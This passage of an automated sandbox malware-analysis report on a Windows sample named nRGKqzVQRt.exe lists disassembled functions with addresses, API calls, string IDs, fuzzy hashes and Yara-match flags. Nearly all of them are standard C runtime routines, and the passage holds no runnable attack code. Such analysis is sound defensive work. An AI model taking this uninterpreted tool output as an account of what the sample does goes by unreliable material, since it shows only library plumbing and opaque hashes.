                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  • _free.LIBCMT ref: 0067870E
                                                  • _free.LIBCMT ref: 00678727
                                                  • _free.LIBCMT ref: 00678765
                                                  • _free.LIBCMT ref: 0067876E
                                                  • _free.LIBCMT ref: 0067877A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast
                                                  • String ID: PrC
                                                  • API String ID: 3291180501-1629617404
                                                  • Opcode ID: c79852c48309a195d8900170292c7256d956fbc528769400df0c6a89e8965495
                                                  • Instruction ID: 6c88fee4445271db11909f8de891d6e696e06c6561f768d1a5aa2ff2d82723ea
                                                  • Opcode Fuzzy Hash: c79852c48309a195d8900170292c7256d956fbc528769400df0c6a89e8965495
                                                  • Instruction Fuzzy Hash: B7B12D759012199FDB24DF14C888AADB7B6FB48314F6085ADE84DA7350DB70AE90CF54
                                                  Function 0041B94A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __alloca_probe_16.LIBCMT ref: 0041B9CE
                                                  • __alloca_probe_16.LIBCMT ref: 0041BA94
                                                  • __freea.LIBCMT ref: 0041BB00
                                                    • Part of subcall function 0041A395: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                  • __freea.LIBCMT ref: 0041BB09
                                                  • __freea.LIBCMT ref: 0041BB2C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                  • String ID: uA
                                                  • API String ID: 1423051803-3888042258
                                                  • Opcode ID: 4828b68452414b976fce63ca4c703ddfeade55bfdfb8d09f6675fe12ed361c88
                                                  • Instruction ID: ced852eb499a8acaff1ad66fc4d965fe1516489bf7db7eeb17bdd08576ef726b
                                                  • Opcode Fuzzy Hash: 4828b68452414b976fce63ca4c703ddfeade55bfdfb8d09f6675fe12ed361c88
                                                  • Instruction Fuzzy Hash: 5151B272500216AFDB219F66CC81EFF3AA9EF44754F25012AFD04A7240EB39DD9186E8
                                                  Function 00441D86 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __setlocale_get_all_strcspn_strlen_strncmp_strpbrk
                                                  • String ID:
                                                  • API String ID: 3252769141-0
                                                  • Opcode ID: 3604c2c1142ad9c356fbba4aa7a1f437c6fbe87c0272fb372a3ded3c1f6cbc27
                                                  • Instruction ID: fcee0553ea2e584bc3324afe79ac2d919ecb72e67bda044fa3c159748f13b20e
                                                  • Opcode Fuzzy Hash: 3604c2c1142ad9c356fbba4aa7a1f437c6fbe87c0272fb372a3ded3c1f6cbc27
                                                  • Instruction Fuzzy Hash: 4D51B875D002159EFF309A718C81BAB77B4AB41354F1444BBE94DE2262DB388EC98B19
                                                  Function 00403D20 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00403DA3
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403DEF
                                                  • __Getctype.LIBCPMT ref: 00403E08
                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00403E24
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00403EB9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                  • String ID: bad locale name
                                                  • API String ID: 1840309910-1405518554
                                                  • Opcode ID: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                  • Instruction ID: 735bfd9e15749c96a7d30fe23bfbaee7cab1fe25536061823035921e9fb647b7
                                                  • Opcode Fuzzy Hash: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                  • Instruction Fuzzy Hash: E25180B1D003489BDF10DFA5D8457CEBBB8AF14315F14426AEC15BB381E779AA08C799
                                                  Function 00663F87 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066400A
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00664056
                                                  • __Getctype.LIBCPMT ref: 0066406F
                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0066408B
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00664120
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                  • String ID: 0vv
                                                  • API String ID: 1840309910-455685883
                                                  • Opcode ID: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                  • Instruction ID: 4027ce197e62b4a7407801f3332779d4fe47e6b22debe8c5262841b6e83afbda
                                                  • Opcode Fuzzy Hash: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                  • Instruction Fuzzy Hash: D25191B1D003589BEB10DFE4D8457DEFBB9AF14310F148129E809AB341EB75EA48CB95
                                                  Function 100028D6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __RTC_Initialize.LIBCMT ref: 1000291D
                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                  • String ID:
                                                  • API String ID: 2442719207-0
                                                  • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                  • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                  • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                  • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                  Function 0040FB20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 0040FB57
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0040FB5F
                                                  • _ValidateLocalCookies.LIBCMT ref: 0040FBE8
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0040FC13
                                                  • _ValidateLocalCookies.LIBCMT ref: 0040FC68
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                  • Instruction ID: feac5375391b8ac6f8c542b9474111b56147410f227dd59f06f236b9ab0aef11
                                                  • Opcode Fuzzy Hash: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                  • Instruction Fuzzy Hash: DB41B834A002089BCF20DF69C891A9E7BB4BF44358F14807BE8156B7D2D779EA59CF94
                                                  Function 10003A20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                  • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                  • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 1170836740-1018135373
                                                  • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                  • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                  • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                  • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                  Function 0041E803 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\nRGKqzVQRt.exe$VA
                                                  • API String ID: 0-1958379148
                                                  • Opcode ID: bbc246354933274b12cc74a321791b42bb805874b1c62c20345f16d1b2f24b5d
                                                  • Instruction ID: 2b41407daedabdefeb68af409a406bd3dd60cc27b104900d0df700e292202cc0
                                                  • Opcode Fuzzy Hash: bbc246354933274b12cc74a321791b42bb805874b1c62c20345f16d1b2f24b5d
                                                  • Instruction Fuzzy Hash: A421B075604105AF9B20BF638C419EB77ADEF013A8710852BFD2587251E739EC819768
                                                  Function 004198F8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                  • Instruction ID: a0b7181f714cca58eaa4ddaccdd8282d036359da2c95a804dd2d27402f6bcf77
                                                  • Opcode Fuzzy Hash: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                  • Instruction Fuzzy Hash: 2A212BB1A21224ABCB314B259C51BEF77689F417A0F21012EED46A7390DB38ED41C5ED
                                                  Function 100072FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                  • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                  • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                  • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                  Function 00420105 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041FE51: _free.LIBCMT ref: 0041FE76
                                                  • _free.LIBCMT ref: 00420153
                                                    • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                    • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                  • _free.LIBCMT ref: 0042015E
                                                  • _free.LIBCMT ref: 00420169
                                                  • _free.LIBCMT ref: 004201BD
                                                  • _free.LIBCMT ref: 004201C8
                                                  • _free.LIBCMT ref: 004201D3
                                                  • _free.LIBCMT ref: 004201DE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: cdd5e4471268dfd21d5239b5f7fa74d2fa29ef36221d2afbd4b55f52868d9946
                                                  • Instruction ID: 19dd4c8c7b65d2d86164fed46a4597e2e19d2a81908c0efd60b677630b23bdd7
                                                  • Opcode Fuzzy Hash: cdd5e4471268dfd21d5239b5f7fa74d2fa29ef36221d2afbd4b55f52868d9946
                                                  • Instruction Fuzzy Hash: 75112E71681704AADA20B7B2CC56FCB779C9F00B04F40082BF29966073DA7DF9898659
                                                  Function 1000C5BF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC
                                                  • _free.LIBCMT ref: 1000C60D
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 1000C618
                                                  • _free.LIBCMT ref: 1000C623
                                                  • _free.LIBCMT ref: 1000C677
                                                  • _free.LIBCMT ref: 1000C682
                                                  • _free.LIBCMT ref: 1000C68D
                                                  • _free.LIBCMT ref: 1000C698
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                  • Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
                                                  • Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                  • Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1
                                                  Function 0068036C Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 006800B8: _free.LIBCMT ref: 006800DD
                                                  • _free.LIBCMT ref: 006803BA
                                                    • Part of subcall function 0067994F: HeapFree.KERNEL32(00000000,00000000,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?), ref: 00679965
                                                    • Part of subcall function 0067994F: GetLastError.KERNEL32(?,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?,?), ref: 00679977
                                                  • _free.LIBCMT ref: 006803C5
                                                  • _free.LIBCMT ref: 006803D0
                                                  • _free.LIBCMT ref: 00680424
                                                  • _free.LIBCMT ref: 0068042F
                                                  • _free.LIBCMT ref: 0068043A
                                                  • _free.LIBCMT ref: 00680445
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 800aa5c3ccae66d18581fa224c31917642b9d86138236abd6320ecb2878ee498
                                                  • Instruction ID: 2afb78da0a5068607fdd79c03332f30897d55f267011058958e581919413109c
                                                  • Opcode Fuzzy Hash: 800aa5c3ccae66d18581fa224c31917642b9d86138236abd6320ecb2878ee498
                                                  • Instruction Fuzzy Hash: DE113A71540B04AAE6E1BBB0CC07FCB77DEAF00700F444D1DB2ADA6162EA65B50D9B66
                                                  Function 00422267 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 004222AF
                                                  • __fassign.LIBCMT ref: 00422494
                                                  • __fassign.LIBCMT ref: 004224B1
                                                  • WriteFile.KERNEL32(?,004244B3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004224F9
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00422539
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004225E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 1735259414-0
                                                  • Opcode ID: a6219b4c7093bb4832425b4a6c8eb892de67332f9088a6a6d1728d394167633a
                                                  • Instruction ID: 6b3e8d957b2b9e0b50a2a91a03589f5d996cc43ffc5c7e42b55ca35f77437dd4
                                                  • Opcode Fuzzy Hash: a6219b4c7093bb4832425b4a6c8eb892de67332f9088a6a6d1728d394167633a
                                                  • Instruction Fuzzy Hash: 85C1D071E00268AFCB14CFA8D9909EDFBB5AF08314F68816AE855F7341D6749D42CF58
                                                  Function 1000B6D8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                  • __fassign.LIBCMT ref: 1000B905
                                                  • __fassign.LIBCMT ref: 1000B922
                                                  • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 1735259414-0
                                                  • Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                  • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                                  • Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                  • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                                  Function 006824CE Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00682516
                                                  • __fassign.LIBCMT ref: 006826FB
                                                  • __fassign.LIBCMT ref: 00682718
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00682760
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006827A0
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00682848
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 1735259414-0
                                                  • Opcode ID: 91191ee0e147da6a94128d3f7330e71c7d2df2151abf819d712ae4673ed49efa
                                                  • Instruction ID: 2bb65f15e7ffdab9006c12e2231e8cf64a67503e77af313c70320869bcb65879
                                                  • Opcode Fuzzy Hash: 91191ee0e147da6a94128d3f7330e71c7d2df2151abf819d712ae4673ed49efa
                                                  • Instruction Fuzzy Hash: AAC1ABB5D002598FCF15DFA8C8909EDFBB6EF48314F28426EE855BB341D630A946CB64
                                                  Function 0066CE00 Relevance: 9.2, APIs: 6, Instructions: 175COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0066CE49
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0066CEB4
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0066CED1
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0066CF10
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0066CF6F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0066CF92
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiStringWide
                                                  • String ID:
                                                  • API String ID: 2829165498-0
                                                  • Opcode ID: 280e6a93f0dbf58af7c1136f8a33f3405dc4919f95456337fc1b616f5409793b
                                                  • Instruction ID: 61bd49023f5a14af9fb1cfbd7f05b99fb6f3c9ca521307754d53dabc2faed41a
                                                  • Opcode Fuzzy Hash: 280e6a93f0dbf58af7c1136f8a33f3405dc4919f95456337fc1b616f5409793b
                                                  • Instruction Fuzzy Hash: 5851BE72A00A1AAFEB205FA0CC41FFABBBBEF44760F158429F955D6250DB718D10DB94
                                                  Function 0040FCE4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0040FCDB,0040E35F,0040D999), ref: 0040FCF2
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040FD00
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040FD19
                                                  • SetLastError.KERNEL32(00000000,0040FCDB,0040E35F,0040D999), ref: 0040FD6B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 680a329933b96cb53ae5c265fb9cc4498949d1d82d710ca85a3e381c7e918393
                                                  • Instruction ID: d2200d1a55058c355170767e85ccfcbc04d90dd67b8a9ae15d7249d72c620bb9
                                                  • Opcode Fuzzy Hash: 680a329933b96cb53ae5c265fb9cc4498949d1d82d710ca85a3e381c7e918393
                                                  • Instruction Fuzzy Hash: 6201283224D31D5EE63826756C4659B2A54EF11775730023FF411751E2EF7D0C8A554C
                                                  Function 10003DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
